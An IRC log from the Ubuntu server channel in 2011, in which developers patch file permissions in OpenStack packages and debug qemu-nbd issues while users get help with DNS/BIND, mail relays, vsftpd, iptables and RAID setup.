<Daviey> zul: In bug 529714 you dropped a patch introduced by us as it seemed to be included upstream.  Seems not, can you investigate as a priority?
<uvirtbot> Launchpad bug 529714 in eglibc "rhythmbox crashed with SIGSEGV in _nss_wins_gethostbyname_r()" [Undecided,Confirmed] https://launchpad.net/bugs/529714
<uvirtbot> New bug: #863277 in tomcat6 (main) "package libservlet2.5-java (not installed) failed to install/upgrade: Ð½ÐµÑ Ð´Ð¾ÑÑÑÐ¿Ð° Ðº Ð°ÑÑÐ¸Ð²Ñ: ÐÐµÑ ÑÐ°ÐºÐ¾Ð³Ð¾ ÑÐ°Ð¹Ð»Ð° Ð¸Ð»Ð¸ ÐºÐ°ÑÐ°Ð»Ð¾Ð³Ð°" [Undecided,New] https://launchpad.net/bugs/863277
<philipballew> QUESTION: Can I set up a VPN server if I have a really crappy router
<qman__> philipballew, a VPN server can be set up as long as you can port forward (in the case of openvpn, udp 1194 or alternate)
<philipballew> alright. yeah, I have my server in a place where the router is the default att router qman__
<cjs226> anyone using reiserfs4?  i ask as I'm looking for a filesystem that allows for filenames longer than 512bytes/characters
<smoser> rbasak, you can probably reproduce that behavior in kvm, right?
<qman__> cjs226, last time I heard anything about reiser4, it was still hopelessly destroying data
<qman__> things could have changed since but I haven't heard about it
<RiotCannon_Work> Anyone able to help me configure a mail relay on ubuntu server? I have been trying to get nullmailer to work for my nagios installation, only problem is no mail reaches my SMTP server
<cjs226> qman_: ouch.
<qman__> RiotCannon_Work, I recommend using postfix, because it's easy
<qman__> just set it up as a satellite system
<qman__> debconf walks you through it
<rbasak> smoser: kvm on its own without libvirt or nova? I expect so.
<rbasak> smoser: (after all I'm stopping nova-compute at that stage)
<smoser> right. i'm just saying, for your testing you could cut out nova-compute.
<smoser> to verify, just launch kvm guest, run dd if=/dev/zero of=/dev/ttyS0 and you're asserting it would lock up.
<www2> hi i hef a problem with my apache server (httpd) and ipv6
<RiotCannon_Work> qman__ to test if postfix is working, what to I do?
<www2> the problem is that i run vew domines and if i login https://b.domine.org i get the cert of http://a.domine.org
<qman__> RiotCannon_Work, telnet localhost 25 and write yourself a mail
<www2> note this work corext in ipv4 but not in ipv6
<topochan> bye people
<zul> Daviey: yeahp
<adam_g> zul: regarding glance, https://bugs.launchpad.net/ubuntu/oneiric/+source/glance/+bug/862844
<uvirtbot> Launchpad bug 862844 in glance "Glance config files and logs are world-readable" [High,In progress]
<adam_g> not sure which is preferred, http://paste.ubuntu.com/699911/ or http://paste.ubuntu.com/699916/
<zul> adam_g: you tested with that postinst?
<adam_g> zul: yeah, both do the job but im not sure which method is preferred (just 0700'ing the whole directory or 0600 the individual files installed via .install)
<zul> adam_g: i would say the 0700
<adam_g> zul: hmm ok. ill put a proposal together in a min. as for the nova logfile_mode thing (bug #862816), should we just do the same to /var/log/nova/ until actually using the flag to set the modes gets fixed upstream? ive submitted a patch that is pending, but don't want to carry that unless it gets accepted
<uvirtbot> Launchpad bug 862816 in nova "/var/log/nova/* is world-readable" [High,In progress] https://launchpad.net/bugs/862816
<zul> adam_g: yes
<zul> adam_g: can you check to see if logrotate wont screw with the permissions as well
<adam_g> zul: ah, yeah ill test in a few
<smoser> is here known data in /var/log/nova that is sensitive ?
<smoser> i know of console-output being logged there, which is potentially moderately sensitive, but anything else?
<soren> smoser: Yeah.
<soren> smoser: sql passwords.
<smoser> well, of course i assumed we were logging passwords
<smoser> i meant anything *else*!
<smoser> :)
<smoser> i'd say thats important to fix then.
<soren> Yeah.
<soren> We don't currently have a "sensitive" flag type.
<zul> soren: no but there is a flag to override the default log file permissions
<hallyn_> zul: trying to reproduce our qcow-ext4 woes with openstack-lxc using a test script.  http://people.canonical.com/~serge/nbd-ext4-qcow-test.bash doesn't give me quite the same results, but it did screw up my laptop's kernel (hanging with sb_sem down or something - can't umount)
<soren> zul: Yeah.
<zul> hallyn_: how about running an instance openstack-lxc and then umount the /var/lib/nova/instances/instances-xxxx/rootfs
<hallyn_> zul: i want to reproduce it without openstack
<hallyn_> zul: though i think it requires snapshotted qcow2 to really break.  So I'm thinking qemu-nbd itself is the problem.
<hallyn_> still testing
<zul> k
<hallyn_> (so kernel is probably waiting on a hung qemu-nbd task)
<hallyn_> zul: smoser may not know it, but he has the problem too :)  i've seen it in his syslog :)
<smoser> hallyn_, i never saw that.
<smoser> hallyn_, do you have a bug opne on this ?
<hallyn_> smoser: not yet
<zul> Daviey: just doing a test build now (re: samba)
<hallyn_> smoser: you never saw it, but it was on that node you gave me access to yeterdsay
<hallyn_> smoser: i needed a better testcase before i could report a bug
<RoyK> hrmf. just updated my home server to 11.04 and now it doesn't join the wifi
<smoser> hallyn_, i dmesged and didn't see it.
<Daviey> zul: cool
<hallyn_> smoser: dmesg | grep 'EXT4' showed no errors about jounral or bh_sumit or anything?
<smoser> i didnt' see it.
<hallyn_> huh
<hallyn_> ok.  i guess i lied
<smoser> i looked, but maybe i looked in the worng place
<smoser> who knows/
<smoser> hallyn_, qemu-nbd is only in the disk write path for instances if instances are lxc
<smoser> that said, i'm assuming qemu-nbd is basically the same code path as would be taken for the qcow backed driver in kvm
<smoser> thats kind of its point in life.
<smoser> so a bug in one would be probably in the other.
<hallyn_> smoser: i've not had a kvm based node in months
<hallyn_> of course i'm vaguely recalling we had a 'fix' for a nbd driver bug that noone really understood...
<adam_g> zul: logrotate cronjob works just fine after chmod 0700 /var/log/nova/
<zul> adam_g: cool
<idlemind324> i'm using iptables -t nat -A PREROUTING -i eth0 -d x.x.x.x -p tcp --dport 22 -j REDIRECT --to-destination y.y.y.y:22 ... where x is external and y is internal
<idlemind324> i get error "iptables v1.4.4: unkown option '--to-destination' but when i look in the man page it is there and is to be used in PREROUTING
<cjs226> anyone using zfs?
<ikonia> not really as it's not available on linux
<TheEvilPhoenix> ^
<hallyn_> heh, forgot a crucial '&' in the uploaded version
<DrNick__> why would you need zfs when you have LVM2
<uvirtbot> New bug: #863543 in samba (main) "package samba 2:3.5.8~dfsg-1ubuntu2.3 failed to install/upgrade: ErrorMessage: il sottoprocesso nuovo script post-removal ha restituito lo stato di errore 2" [Undecided,New] https://launchpad.net/bugs/863543
<zul> adam_g:  any closer to getting those fixes in?
<adam_g> zul: yes, trying to submit proposals but launchpad is not working :|
<adam_g> timeouts when i try submitting them
<zul> bah
<adam_g> =/win 24
<adam_g> "Trying again in a couple of minutes might work."
<zul> adam_g: "we are sorry we are unable to complete the call as dialed please try again later"
<SpamapS> DrNick__: ZFS and LVM2 aren't even in the same galaxy ;)
<DrNick__> yeah, lvm2 is much better :p
<SpamapS> at being less capable, yes.
<SpamapS> don't get me wrong.. I lurve lvm
<SpamapS> just.. ZFS has bits in it that LVM just can't have, or probably won't ever have.
<SpamapS> btrfs is a much better comparison.. but.. who knows when we'll get that
<DrNick__> interesting, such as?
<SpamapS> data checksumming for one
<SpamapS> http://blogs.oracle.com/bonwick/entry/zfs_end_to_end_data
<SpamapS> De-duplication is another nice one
<SpamapS> http://blogs.oracle.com/bonwick/entry/zfs_dedup
<DrNick__> both nice to have features, but i suppose with pretty specific applications
<SpamapS> DrNick__: just massive scale. :)
<SpamapS> DrNick__: the data integrity isn't exactly a specific application thing. It is intended to prevent those "WTF" errors that people never even know about.
<DrNick__> yeah, would that have a performance impact tho?
<adam_g> SpamapS: http://oss.oracle.com/projects/data-integrity/  looks like LVM/DM could be expanded to take advantage
<nowashburn> anyone familiar with vsftpd?
<DrNick__> yeah fairly familiar
<nowashburn> awesome, first time setting up vsftpd (or any ftp daemon at that matter) and was wondering what the difference was between setting umask and file_open_mode
<mdlueck> I have been trying to track down why 10.04 LTS servers do not automatically select kernel updates, but 10.04 desktop machines do? http://ubuntuforums.org/showthread.php?t=1807248
<rich_> Need advice on location of lucid JeOS suite for vmbuilder use.  Anyone?   I'm getting : Invalid suite. Valid suites are: dapper gutsy hardy intrepid jaunty karmic
<mdlueck> @rich_ Those distros are pretty old, maybe JeOS has been abandoned
<ikonia> mdlueck: dead for ages
<DrNick__> i've never needed to set file_open_mode, just changed the default umask for users to 022, or 077
<nowashburn> yeah, ill be the only one using the ftp account and wanted default 755 permissions, i couldnt seem to do this with umask and needed file_open_mode. does that sound normal?
<zul> adam_g: just nova and glance right? (im reviewing swift right now)
<mdlueck> Anyone with feedback on if Ubuntu Server should auto-select / auto-detect kernel updates or not?
<adam_g> zul: yea
<DrNick__> a umask of 022 should give you what you want
<mdlueck> Initially when 10.04 came out I was getting notified (apticron), but for the past several kernel updates I must manually select the new kernel. How can I get automatic back?
<nowashburn> no matter what i set the umask, the default file creation would not include execute permissions
<DrNick__> hm strange. did you restart vsftpd after making modifications
<nowashburn> other than that, the only other thing im struggling with is default directory permissions. when the user i created creates a directory, the directory has no default permissions. must be a way to at least make directories writeable upon creation?
<nowashburn> yes, i did restart
<zul> adam_g: swift taken care of...debdiffs?
<DrNick__> try setting file_open_mode to 0777
<adam_g> zul:  generating now
<nowashburn> changed file_open_mode to 0777, file upload is fine but still the issue with creating directories
<philipballew> QUESTION: can i set up a way to get alerted if my server goes down or something happens to it
<adam_g> zul: attached to both bugs
<zul> bug numbers?
<adam_g> zul:  bug #862816 and bug #  #862844
<uvirtbot> Launchpad bug 862816 in nova "/var/log/nova/* is world-readable" [High,In progress] https://launchpad.net/bugs/862816
<adam_g> zul: or if you want to just 'bzr merge' the linked branches, i guess that would work too?
<zul> it should im not going to risk it right now though
<DrNick__> what permissions are set on the directory?
<zul> adam_g: applied the patches thanks
<Daviey> zul: are you uploading today?
<zul> Daviey: yeah
<nowashburn> looking at the directory in zilezilla after creation it just says xxx. i guess that means nothing is set?
<zul> swift is already uploaded
<idlemind324> so say i wrote a handy file named firewall.sh that has all the rules i want setup for my firewall. where is the best place to put that for it to run during boot-up?
<DrNick__> can you double-click it in filezilla to open it
<Daviey> adam_g: have you come across http://dep.debian.net/deps/dep3/ ?
<adam_g> Daviey: doh. ive read it, but i guess i should freshen up next time huh?
<idlemind324> hmm firefox is making me angry
<nowashburn> DrNick__: I cant open the folder, but i do have permissions to change the permissions
<idlemind324> ie 9 displays my xml output with it's xslt
<idlemind324> firefox does not
<idlemind324> this has to be a first
<DrNick__> what's the output of ls -l on the host
<nowashburn> total 4
<nowashburn> -rw-r--r-- 1 root root 1320 2002-12-05 00:58 jcameron-key.asc
<zul> Daviey: nova uploaded
<zul> Daviey: glance uploaded as well
<Daviey> zul: super!
<uvirtbot> New bug: #836922 in swift "swift-ring-builder exit status confusing" [Undecided,Fix committed] https://launchpad.net/bugs/836922
<uvirtbot> New bug: #861656 in linux (main) "many ext4 errors " [Undecided,Confirmed] https://launchpad.net/bugs/861656
<SpamapS> adam_g: definitely LVM could do that.. but I doubt it will be since BTRFS is slated to supersede the need.. I think. :)
<hallyn_> smoser: i think nova's nova/virt/disk.py:_unlink_device() perhaps should first check if the device is mounted?
<hallyn_> rather than pursuing a questionable kernel fix...
<hallyn_> i suppose one could argue qemu-nbd should be doing that check
<smoser> nova is the easiest place to fix that.
<smoser> and its not going to be harmful
<Daviey> Doctor, Doctor, my arm hurts when i twist it in a funny angle.
<soren> nnnnnggggghhhhh....
 * soren stabs user-mode-linux
<hallyn_> Daviey: i'm guessing there are several ongoing conversations your comment could apply to?
<hallyn_> smoser: all right... i'll do it in nova.
<hallyn_> i get to target that bug at a 3d package, yay :)
<Daviey> hallyn_: :)
<smoser> hallyn_, you think just search through /proc/mounts for '/dev/nbdX' ?
<Daviey> I wonder if we'll exceed 20 nova patches by release.
<smoser> or /proc/mountinfo might be better.
<hallyn_> smoser: yes
<hallyn_> smoser: you know i might not even need to do that check.  it might just help if nova actually checked the return value of umount.
<soren> hallyn_: Doesn't it=
<soren> ?
<hallyn_> soren: ah, no - i suspect utils.py will raise an exception
<hallyn_> soren: that's why i only see it when i do euca-terminate-instances the *second* time :)
<hallyn_> so it needs the check in _unlink
<hallyn_> _unlink_device that is
<Daviey> RoAkSoAx: around?
<Daviey> adam_g / hggdh: You'll be happy to know the cobbler-enlist tool works from the cd menu.
<adam_g> Daviey: nice!
<hggdh> Daviey: \o/
<hggdh> good work you both :-)
<Daviey> hggdh: and you.
<Daviey> adam_g: I haven't tried preseeding it as an option yet.
<Daviey> I'm kinda worried where the hostname can originate from..
<Daviey> I'm wondering if cobbler-enlist should generate a name based on MM-AA-CC-AA-DD-RRess if a null value is provided
<robbiew> Daviey: that would "seem safe"...maybe with "ubuntuserver-" prepended
<adam_g> hmm
<hallyn_> zul: yay, no more ext4 errors
<hallyn_> lemme just keep pounding this , uh, fine lady
<Daviey> robbiew: node10.orchestra.target.waiting.for.juju.love.local
<robbiew> umm...no
<robbiew> lol
<SpamapS> we all need some juju love
<robbiew> maybe prepend orchestra-
<SpamapS> I like just  ubuntu-XX-XX-XX-XX-XX-XX
<robbiew> works too
<SpamapS> Its a reasonable length, and pimps us without being conspicuous
<robbiew> or...not allow null value for hostname
<Daviey> it's not known that the target will be ubuntu :)
<SpamapS> Daviey: even better, that will make them feel even sillier for not installing Ubuntu with it. ;)
<Daviey> robbiew: Well, in order to automate this - it needs to generate a hostname on it's own, i think
<Daviey> SpamapS: hah
<robbiew> then ubuntu- it is
<robbiew>  I agree with SpamapS :P
<robbiew> they can always change it...the OS of course, not the name
 * robbiew goes to workout....Insanity!!!!!!! \o/
<SpamapS> Daviey: does this trigger from the PXE boot as well?
<Daviey> SpamapS: That is the /plan/, but it's awaiting a preseed.
<SpamapS> cause even w/o that.. its useful .. admins can carry around a usb key that they boot from to make this come up
<Daviey> SpamapS: adding it to the ISO was for 2 reasons, try-before-you-commit usage & adds the ability to preseed for free (main target)
<SpamapS> An OEM could even ship it as the default image on disk.. :)
<Daviey> hah, RoAkSoAx was looking at creating a preseed for cobbler to ship, i suspect he didn't have time this week to get to that
<sarthor> I Installed apache2 on my ubuntu server, with apt-get -y install apache2, then i put index.html file in /var/www/ index.html file have some arabic words, .. I can not see that arabic words when i am browsing the site... how to solve this problem, to be able to view all the arabic fonts.
<idlemind324> sarthor what character set is the document saved as? is the html file DOCTYPE declared with that encoding as well? does your browser have those fonts available?
<uvirtbot> New bug: #863738 in cobbler (universe) "cobbler package must depend on python-cobbler" [Low,New] https://launchpad.net/bugs/863738
<sarthor> I am new to linux. httpd room asked "find out what your distro renamed the httpd binary to, then.", I am using ubuntu-server 11.04, So what will be my reply there in httpd room?
<SpamapS> sarthor: apache2
<TheEvilPhoenix> ^
#ubuntu-server 2011-10-01
<uvirtbot> New bug: #863755 in cobbler (universe) "/var/lib/cobbler/webui_sessions has insecure permissions" [Undecided,In progress] https://launchpad.net/bugs/863755
<footvilla> can someone help me
<footvilla> im trying this tutorial
<footvilla> and not sure what to do on one of the steps
<pmatulis> !ask | footvilla
<ubottu> footvilla: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)
<uvirtbot> New bug: #803604 in libcgroup (universe) "package cgroup-bin 0.37.1-1ubuntu2 failed to install/upgrade: Unterprozess installiertes post-installation-Skript gab den Fehlerwert 1 zurÃ¼ck" [High,Expired] https://launchpad.net/bugs/803604
<Samic> Do I need to install a DNS server on my host to connect my domain to it?
<Samic> Do I need to install a DNS server on my host to connect my domain to it?
<SpamapS> Samic: https://help.ubuntu.com/10.04/serverguide/C/dns.html
<Samic> SpamapS: couldn't you just answer with yes or no??!!
<SpamapS> Samic: Its complicated, so no, its not a yes/no question even though you phrased it as such.
<SpamapS> Samic: the bottom line is, if you have a domain you need *somebody* to do DNS for it.
<SpamapS> Samic: if your registrar provides free DNS (most do these days) then no, you don't need DNS services on your server.
<Samic> is it something about my host (setting in ubuntu) or my domain company?
<SpamapS> Samic: you just need to map the address of your server to the hostname you want.
<Samic> I have read those manual about DNS on help.ubuntu.com but I don't know what should I do
<Samic> I have a domain (samic.us) and a server (79.143.176.96)
<Samic> i don't know how to connect hese two!
<SpamapS> Name Server:                                 NS1.SAMIC.US
<SpamapS> Name Server:                                 NS2.SAMIC.US
<Samic> do you get any result from running   dig samic.us ns    on your box?
<SpamapS> no
<SpamapS> whois samic.us
<SpamapS> Typically your registrar will require you to give those addresses.
<Samic> for me dig answers with serverfail which I don't understand what's the meaning and what should I do
<SpamapS> yeah dig is answering that way because you did not give ns1.samic.net a real address yet.
<Samic> ok thanks! we are going somewhere! how should I give ds1.samic.us an address?
<SpamapS> Samic: so you will need to install DNS on your server, and you'll need to configure it for your domain.as a "Primary Master"
<SpamapS> Samic: then you need to inform your registrar that NS1.SAMIC.US == x.x.x.x
<SpamapS> They will, in turn, put that into the root servers.. so dig will start to work.
<Samic> aha! so I do need to install BIND!
<SpamapS> Yes you do, *or* (the easier option) let your registrar or some other cheap DNS hosting company handle it.
<SpamapS> godaddy does it for free
<Samic> thank you very much!
<Samic> you solve my problem
<Samic> I'll try it now
<SpamapS> Samic: good luck! :)
<uvirtbot> New bug: #862844 in glance (main) "Glance config files and logs are world-readable" [High,Fix released] https://launchpad.net/bugs/862844
<Samic> in configuring BIND, should I make make a zone in /etc/bind/named.conf.local   for  samic.us (my domain) or ns1.samic.us ?!
<ikonia> Samic: the zonefile should contain data about both your zone hosts and their name servers
<Samic> I want to have two nameservers (ns1.samic.us and ns2.samic.us) so /etc/bind/named.conf.local should be like this:
<Samic> zone "samic.us" {
<Samic>         type master;
<Samic>         file "/etc/bind/db.samic.us";
<Samic> };
<Samic> };zone "ns1.samic.us" {
<Samic>         type master;
<Samic>         file "/etc/bind/db.ns1.samic.us";
<Samic> };
<Samic> zone "ns2.samic.us" {
<Samic>         type master;
<Samic>         file "/etc/bind/db.ns2.samic.us";
<Samic> };
<Samic> ?
<Samic> BIND is really confusing!!
<Samic> ikonia: can you help me?
<ikonia> Samic: you don't need a zone file for the individual name servers
<ikonia> Samic: you need 1 zone file for the zone, that contains the zone data and the name server
<Samic> ok so i just need zone "samic.us"
<ikonia> Samic: yes
<ikonia> you don't actually have zones called ns2 or ns1, your zone is your domain
<mranim8> Hi. Can someone help me with an installation question? I just downloaded 11.04 (x86, the regular version, not the server edition) to put onto a freshly built file server. I want to use btrfs instead of ext4, so I go to configure the partitions manually. I have 5 disks (one system, 4 data). I can't create primary partitions on the data drives without adding a mount point, and I can't seem to specify my own mount point. In
<mranim8> should I be using Ubutu Server instead?
<Samic> ikonia: can you help me to write db.samic.us here:  http://ietherpad.com/eBd9zRGcHT
<ikonia> Samic: not really, it's your zone file
<ikonia> Samic: this zone isn't going out onto the public internet is it ?
<Samic> ikonia: I didn't understand your question
<ikonia> Samic: you're not going to use this dns server on the public internet are you ?
<Samic> yes!
<Samic> i want to connect my domain (samic.us) to my host (79.143.176.96)
<ikonia> Samic: I would strongly advise against putting a dns server on the public internet unless you know what you are doing
<ikonia> Samic: you don't seem confident with how dns works or how to setup and manage it, hence why I would strongly advise against it
<ikonia> there are many very cheap (maybe even free) public dns services on the internet, it would make more sense in my eyes for you to use one of those until you actually understand how it works
<Samic> ikonia: can you take a look at here :  http://ietherpad.com/eBd9zRGcHT
<ikonia> Samic: I've already looked at it.
<ikonia> hence why I've just said what I did
<Samic> ok forget about security ;)
<Samic> I don't know where to put ns1 ans ns2
<ikonia> no
<ikonia> it's not just security.
<ikonia> I've given you my opinion/advice on the matter and I'll leave it there
<Samic> is there anyone here who know how to setup nameservers?!
<Samic> anyone knows how to configure BIND?
<udienz> Samic, what's up?
<udienz> Samic, https://help.ubuntu.com/community/BIND9ServerHowto
<Samic> udienz: I have read that
<Samic> udienz: can you take a look at http://ietherpad.com/eBd9zRGcHT
<udienz> Samic, is there any errors produced
<Samic> can you see samic.us in your browser?!
<udienz> Samic, yep
<Samic> really?!! how about samic.org ?!
<udienz> Samic, http://paste.ubuntu.com/700377/
<udienz> samic.org doens't have A record
<Samic> i have set samic.org nameservers to ns1.samic.us and ns2
<Samic> I don't know what's the problem about it
<udienz> Samic, samic.org must decaled in zone too
<StevenR> Samic: samic.org has no NS records
<Samic> but    -whois samic.org    is correct!!
<Samic> can't I just make ns1.samic.us and point samic.org to it?!
<StevenR> Samic: if I trace it, it appears to be there
<StevenR> looks like you need to wait a while or it to propagate
<Samic> so it's correct to setup ns1.samic.us and point samic.org
<StevenR> you can use ns1.samic.us as a nameserver for samic.org
<udienz> and creating samic.org zones at ns1.samic.us
<Samic> StevenR: ok thanks! so you think configuration http://ietherpad.com/eBd9zRGcHT  is allright?
<StevenR> Samic: that looks ok... is that the configuration for ns1.samic.us?
<Samic> StevenR: those are all configuration files! you can see file name at top of each
<StevenR> Samic: is that the configuration for ns1.samic.us ?
<StevenR> (it's a yes or no answer)
<Samic> StevenR: I don't understand your question correctly!
<Samic> I have domain (samic.us) and I have these filese there!
<StevenR> Samic: which server is that configuration for?
<Samic> /etc/bind/named.conf.localÂ Â Â Â Â and   Â Â Â  /etc/bind/db.samic.usÂ Â Â Â Â Â Â Â and      /etc/bind/db.79
<StevenR> Samic: that server won't answer queries for samic.org, you will need another zone file for that.
<Samic> StevenR: i can copy these files for samic.org too but the problem is Reverse Zone File
<Samic> /etc/bind/db.79
<StevenR> why is that a problem?
<Samic> you can see it at the end of http://ietherpad.com/eBd9zRGcHT
<Samic> which address should I put there?!
<StevenR> that zone file doesn't look right, but I'm not certain about it. You don't need a second reverse zone file.
<Samic> StevenR: so I don't need to change this reverse zone file?!
<StevenR> Samic: you do. the PTR records should include fully qualified domain names, including the trailing .
<Samic> it's really confusing!!! can you change it in http://ietherpad.com/eBd9zRGcHT  ?
<StevenR> Samic: try dig 243.140.71.82.in-addr.arpa PTR
<Samic> StevenR: what's that?!
<Samic> 243.140.71.82.in-addr.arpa. 7200 IN	PTR	zen.co.uk.
<StevenR> Samic: the NS records in your reverse zone file don't exist, and the @ record is invalid.
<Samic> can you correct it thee please?!
<Samic> StevenR: can you correct it there please?!
<StevenR> Samic: no, you need to work out what the correct things should be. You've added records to other zones, you should be able to add NS records to this one :)
<Samic> :(
<Samic> StevenR: should I just add    ns1Â Â Â Â Â  INÂ Â Â Â Â  AÂ Â Â Â Â Â  79.143.176.96
<Samic> ns2Â Â Â Â Â  INÂ Â Â Â Â  AÂ Â Â Â Â Â  79.143.176.96
<Samic> to it?!
<StevenR> no
<StevenR> you need NS records, not A records. Don't put A records in a reverse zone
<Samic> is it right now?! can we chat there?!
<Samic> StevenR: are you still there?!
<StevenR> back now
<Samic> StevenR: my question is about nameservers (like ns1.samic.us)
<Samic> if I create one of them then can I point any other domain (like domain.org) to it without anymore configuration?
<StevenR> for every domain that the nameserver will answer queries for as the authoritative nameserver, you must have a zone file for it
<StevenR> so if you want samic.org and samic.us to be run from the same nameserver, you need a zone file for each domain.
<Samic> StevenR: ok thanks! I got that but what about reverse file? I should write domain name there too. which domain should I state there?!
<StevenR> what do you mean?
<Samic> there is a reverse file (in my example it's /etc/bind/db.79 as you can see on http://ietherpad.com/eBd9zRGcHT) on  the 8th line of that file I should write domain name
<Samic> if I want to connect two domain to a host what should I do?! which domain should I stat there?!@
<StevenR> which line in the pad?
<Samic> StevenR: 71
<StevenR> the... "primary" one
<StevenR> which of samic.us and samic.org is the most used or most important one?
<Samic> StevenR: wait a sec! when I want to connect two domains to a host both of the should be Primary Master?
<StevenR> @       IN      SOA     ns1.samic.us. root.samic.us. (
<StevenR> 71 should be
<StevenR> ^
<Samic> so how qbout ns2 ?!
<StevenR> it doesn't need to appear in the SOA record
<StevenR> as it's not the primary nameserver for that zone
<StevenR> now you just need some PTR records in the reverse zone
<Samic> StevenR: you can edit there so I can see exactly what do you mean!
<StevenR> you SOA records for samic.org and samic.us also should include the FQDN of the primary nameserver for that domain
<Samic> StevenR: I used https://help.ubuntu.com/10.04/serverguide/C/dns-configuration.html  !
<Samic> StevenR: Steven! can you edit it there PLEASE!!!
<StevenR> Samic: that howto shows you what to do, very clearly. Look at the examples. I'm not going to spoonfeed you, I don't think that's the right way to teach or help people.
<Samic> StevenR: can you show me which part of that howto is talking about FQDN in SOA?!
<StevenR> it's in all of the examples
<StevenR> it might not be referred to directly
<Samic> I changed some in http://ietherpad.com/eBd9zRGcHT   is everything right now?!
<StevenR> you've not changed the SOA line
<StevenR> or it's not updating
<Samic> because I don't know what should I do about it!
<StevenR> well, you made it right for the reverse zone
<Samic> StevenR: I'm at work and I don't have a lot of time. on the other hand there isn't good manual and howto about bind. If you know how to correct these files please help
<Samic> because i think you are just enjoying that you know something and I want that! It about an hour and if you wanted to help you could do it in few seconds
<StevenR> Samic: no, it's not that at all. I refuse to spoonfeed people, because that teaches bad habits, doesn't help them learn and doesn't improve their ability to learn. I mentor systems techs at work, and I don't spoonfeed them either, even though it would mean they would get the answer faster.
<Samic> StevenR: this channel is for getting help! and you are not helping. you just say there is a problem without giving a solution. this is not helping nor teaching! if you want to teach you should say there is a problem there because ... and the solution is .... because ....
<StevenR> I've already given you the answer. the SOA record is wrong because it does not include a FQDN for the primary nameserver for that domain.
<StevenR> I don't know what FQDN you should put there because it's your nameserver, not mine.
<Samic> StevenR: YOU ARE REALLY SICK! YOU KNOW WHAT? JUST GO TO HELL
<StevenR> *sigh*.
<koolhead17> hi all
 * airtonix chuckles
<RoyK> hm.. with ubuntu 11.10 beta, I can't find a server cd
<oCean> RoyK: http://releases.ubuntu.com/oneiric/
<RoyK> thanks
 * RoyK is setting up a home server and relies on the bleeding edge :D
<KM0201> hope you dont like a stable server
<KM0201> installing an unstable OS as a home server, makes no sense
<RoyK> well, it's not that far till release
<RoyK> it's a home server + a toy
<KM0201> deosn't really matter
<RoyK> well, cut the crap. I've only been working on linux since 1994 or so. I think I know what I'm doing
<KM0201> i've seen updates break a system a week before release in ubuntu (granted, it gets fixed quickly, but it has happened)
<KM0201> i didn't say ou didn't.
<KM0201> was just making a point..
<qman__> not sure exactly what that point is
<KM0201> i know how to drive, but i don't deliberately do ignorant things because i feel i can safely do it.
<qman__> unstable beta software is unstable beta software?
<RoyK> KM0201: it's an exactly good point to make, but ubuntu beta isn't exactly unstable
<RoyK> for production machines, I only use LTS
<KM0201> RoyK: i guess thats a matter of opinion..
<qman__> all but one of my machines are running lucid
<qman__> that other one is runnind hardy
<RoyK> i think I have 5-6 hardy machines still
<RoyK> no reason to upgrade them so long as updates are available and they work
<KM0201> my ubuntu machines are 11.04
<qman__> yep
<RoyK> KM0201: talking of stability - why 11.04?
<KM0201> well, desktops, just cuz they are for the home... LTS has little to do w/ stability, and more to do w/ support.. i've had zero probs w/ 11.04
<RoyK> desktops I run 11.04 on
<RoyK> not servers
<qman__> I used to upgrade my desktop every 6 months
<qman__> and every time I did, stuff broke
<qman__> the only versions that actually had everything working for me were 6.10 and 9.10
<KM0201> as for my server, it was my first server install after i bricked freenas, so i figured i'd use 11.04 and 11.10 to make sure things are figured out, then 12.04, i'll stay LTS>
<KM0201> qman__: i always clean install, so.. can't really speak for upgrades
<qman__> the breakage in lucid is annoying but passable
<RoyK> qman__: we have some desktops at observatories and stuff - really combined server+desktop - those all run lucid (soon, when we get rid of those fedoras)
<qman__> so I guess I have to wait for 12.10 to have everything working again
<Olotila> Adaptec 6805E requires floppy install, but I do not have even the interface in mobo. What to do?
<qman__> why would you need a floppy?
<qman__> only Windows has such arbitrary requirements for driver installation
<Olotila> I will use it in both Ubuntu and Windows, needs to make two separate installations according to guide
<qman__> that sounds like a really bad idea
<qman__> but in any case, driver floppies are still a windows-only issue, and only old versions at that
<qman__> build the raid in the card's bios, install windows to one partition, install ubuntu to another
<Olotila> that would work also if I have win7 allready in separate partition?
<qman__> yes
<qman__> Windows is very rude and imposes its own bootloader regardless of what has been installed
<qman__> so the proper order to install multiple operating systems is windows oldest to newest, followed by linux
<Olotila> yeah
<Olotila> will the separate windows see the raid set?
<qman__> depends on if you install the drivers
<qman__> however, windows will not be able to read linux filesystems
<Olotila> no need to
<qman__> you can install ext2 drivers but it's still clunky
<Olotila> only the other way around
<Olotila> so I would boot inside the raid, but make the separate windows to start?
<qman__> huh?
<qman__> you install the bootloader to whichever disk is set to boot
<Olotila> you said I need to install windows anyways in one of the partitions of the raid set
<qman__> it doesn't matter whether that's on a raid or regular disk
<qman__> you don't have to
<qman__> only if you want windows installed on the raid set
<Olotila> when I plugged the card in, I could not boot from any other device other than USB
<qman__> which is what your original question sounded like
<qman__> you need to set the boot order in the BIOS
<Olotila> ... now when I think about it, I seem to have another problem here
<qman__> disks are just disks
<qman__> whether they're a raid set or not
<Olotila> I was not able to see my primary os disk in bios
<qman__> as long as your operating systems have the needed drivers, it doesn't matter what sort of configuration you use
<Olotila> after plugiin the card in
<qman__> then it's more likely a problem with the two disk controllers
<Olotila> yeah
<Olotila> the adaptec takes over
<qman__> maybe a resource conflict, or a loose cable, or hardware incompatibility
<Olotila> and it did not see my intel ssd
<Olotila> it gave an error about pci I think, just a fraction of a second when booting
<Olotila> not enough something
<qman__> try turning some features off that you don't need
<qman__> like if you have unused serial or parallel ports, or don't use sound, or something like that
<Olotila> yeah
<Olotila> first I'll take of 4 disks currently in raid
<Olotila> which I am planning to throw into adapte
<Olotila> c
<Olotila> config sata ports to ahci
<Olotila> then boot, see what happens
<Olotila> then worry about the wonderfull floppy issue, ah how much I love it
<qman__> if you're not running windows 2003 or older, you do not need floppies, period
<Olotila> I hope so, not sure would I hang myself or somehow get a floppy drive in play
<Ronnie> i recently obtained a VPS, i want to send and receive mail. is it wise to install my own mail server, and what are the 'costs' (think about safety, spam etc) or is it better to use an thirth party service (budget is available)
<qman__> Ronnie, before you consider any of that, make sure your VPS provider allows you to send mail directly
<qman__> many do not, and provide you a relay host instead
<Ronnie> qman__: our host does not provide a relay host, if im right we are allowed to send mail (need to check that tought)
<qman__> that aside, spam filtering is going to be the most costly part
<qman__> locking down a mail server is not that hard, just don't allow relaying and you're 90% there
<Ronnie> qman__: and the other 10%
